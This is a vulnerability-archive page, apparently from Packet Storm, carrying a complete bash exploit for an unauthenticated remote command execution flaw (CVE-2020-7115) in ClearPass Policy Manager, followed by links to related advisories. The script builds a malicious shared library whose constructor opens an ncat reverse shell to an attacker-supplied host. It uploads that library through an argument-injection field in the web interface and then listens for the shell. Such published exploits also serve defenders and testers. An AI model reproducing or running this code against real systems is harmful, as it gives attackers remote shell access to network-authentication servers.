Lucene search
SpicyitalianPACKETSTORM:158368HistoryJul 08, 2020 - 12:00 a.m.
ClearPass Policy Manager Unauthenticated Remote Command Execution
2020-07-0800:00:00
spicyitalian
packetstormsecurity.com
181
0.948 High
EPSS
Percentile
99.3%
`#!/usr/bin/env bash
# ClearPass Policy Manager Unauthenticated Remote Command Execution in the WebUI (CVE-2020-7115)
# For best results use OpenSSL/libcrypto shipped with RHEL/CentOS 7.x.
# Questions? Contact [email protected].
if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 0
fi
cat <<EOF >>payload.c
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF
gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
ncat -v -l $3 $4
`
Related
cve
cve
CVE-2020-7115
2020-06-03 13:15:11
checkpoint_advisories
checkpoint_advisories
prion
prion
Authentication flaw
2020-06-03 13:15:00
githubexploit
githubexploit
attackerkb
attackerkb
CVE-2020-7115
2020-06-03 00:00:00
cvelist
cvelist
CVE-2020-7115
2020-06-03 12:43:13
saint
saint
Aruba ClearPass Policy Manager tipsSimulationUpload command execution
2020-08-13 00:00:00
Aruba ClearPass Policy Manager tipsSimulationUpload command execution
2020-08-13 00:00:00
Aruba ClearPass Policy Manager tipsSimulationUpload command execution
2020-08-13 00:00:00
zdt
zdt
nvd
nvd
CVE-2020-7115
2020-06-03 13:15:11
exploitdb
exploitdb
